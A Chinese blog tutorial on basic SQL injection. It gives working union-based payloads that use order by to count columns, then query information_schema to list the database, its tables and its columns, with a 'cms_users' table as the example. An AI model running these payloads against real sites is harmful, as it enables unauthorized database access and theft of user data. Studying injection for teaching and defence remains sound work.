首页 > 其他分享 >基本黑客技术

基本黑客技术

时间:2023-12-06 11:45:58浏览次数:35  
标签:基本 1.3 admin 数据库 union 黑客技术 select schema

一、SQL 注入

1.1 看看是否有 sql 注入漏洞

加个引号可以看出来

1.2 判断是数字注入还是字符注入

字符:admin' and 1=1#

数字:admin and 1=1

1.3 获得数据库的信息:数据库名、表名、字段名、对应信息

1.3.1 首先获得这个表的字段数量

admin' and 1=1 order by [num] #

这个字段自己试可以试出来。

1.3.2 通过 union 获得当前数据库名

admin' and 1=2 union select 1,2,3,database(),4,5 #

1.3.3 查询 information_schema 数据库获得数据库所有表的名称

admin' and 1=2 union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema=database() #

1.3.4 查询指定表中所有子段名称

admin' and 1=2 union select 1,2,group_concat(column_name),4 from information_schema.columns where table_name='cms_users' #

1.3.5 查询这个表的任意内容

admin' and 1=2 union [select 语句]

标签:基本,1.3,admin,数据库,union,黑客技术,select,schema
From: https://www.cnblogs.com/nerd-/p/17879156.html

相关文章

  • 实验6熟悉的hive的基本操作
    今天完成了大数据实验六的hive的基本操作参照实验6熟悉Hive的基本操作_hive环境搭建实验报告-CSDN博客、这位博主的代码,但是前期的启动hive并没有按照博主的来,启动hive大家参照我之前的一篇博客来就行我是从黑马教程跟着下载的hiveHIVe的启动以及datagrip配置-王庆园-博客......
  • 指针(2)指针基本了解及其应用
    <1>指针(1)指针基本概念1)引入:提出问题:如果能够将取得的变量的地址传递给一个函数,能否通过这个地址在那个函数内访问这个变量2)回顾scanf函数功能格式:scanf("%d",&i)深入探讨:scanf()的原型应该是怎样的?我们需要一个参数能保存别的变量的地址,如何表达能够保存地址的变量?......
  • Border 基本使用
    Border基本使用1单线效果  代码:<BorderGrid.Row="0"BorderThickness="0,0,0,1"BorderBrush="Red"/>说明:BorderThickness="0,0,0,1"可以分别设置四条边,顺序是:左上右下2虚线效果  代码:<BorderGrid.Row="0"BorderThick......
  • C语言中的基本数据类型及其格式化输出
    C语言中的基本数据类型及其格式化输出基本数据类型从下图可以看出,C语言中的基本数据类型包括了整型(int)、字符型(char)、浮点型(float)和双精度浮点型(double)。在声明变量时,不同数据类型都会分配不同的存储空间,而且还跟操作系统有关。char//有符号字符型,1个字节u......
  • HTML学习笔记一:html简介和基本结构
    HTML学习笔记一一、什么是HTML?众所众知,我们打开的网页是一个一个的HTML,网页静态的结构是由html完成,而各式各样的表现样式是由css完成,至于网页与服务器之间的交互行为则都交给了javascript完成。HTML和CSS本质都是结构化、标准化的语言,用于定义页面结构,样式渲染。不得不提的就是......
  • Form表单的基本使用
    原文链接:https://blog.csdn.net/weixin_52851967/article/details/1285231741、什么是表单        表单在网页中主要负责数据采集功能。HTML中的<form>标签,就是用于采集用户输入的信息,并通过<form>标签的提交操作,把采集到的信息提交到服务器端进行处理。2、表单的组成部......
  • 文件的基本操作
    文件的基本操作1.操作文件打开的两种方式#1.文件的操作方式一:#讲文件以指定编码格式打开,讲文件句柄赋值给变量fpfp=open('01.txt','w',encoding='utf-8')#把hello写入文件fp.write("hello")#关闭文件fp.close()2.文件的操作方式二:#Python解释器内置了一个文......
  • 文件操作的基本流程
    文件操作的基本流程1.基本流程有了文件的概念,我们无需再去考虑操作硬盘的细节,只需要关注操作文件的流程#1.打开文件,由应用程序向操作系统发起系统调用open(...),操作系统打开该文件,对应一块硬盘空间,并返回一个文件对象赋值给一个变量ff=open('a.txt','r',encoding='utf-8'......
  • Quartz核心原理之架构及基本元素介绍
    1什么是QuartzQuartz是一个作业调度框架,它可以与J2EE和J2SE应用相结合,也可以单独使用。它能够创建多个甚至数万个jobs这样复杂的程序,jobs可以做成标准的java组件或EJBS。Quartz很容易上手,创建一个任务仅需实现Job接口,该接口只有一个方法voidexecute(JobExecutionContextcontex......
  • MySQL基本操作
    //mysql数据库管理工具简称叫数据库(存放数据,作为动态网站开不可缺少的一环)mysql是一种关系型数据库基本语法:1.查询当前MySQL下有的所有数据库showdatabases;2.创建数据库createdatabase数据库名数据库选项(字符集,校对集)(大部分情况我们都不进行数据选项的设置)......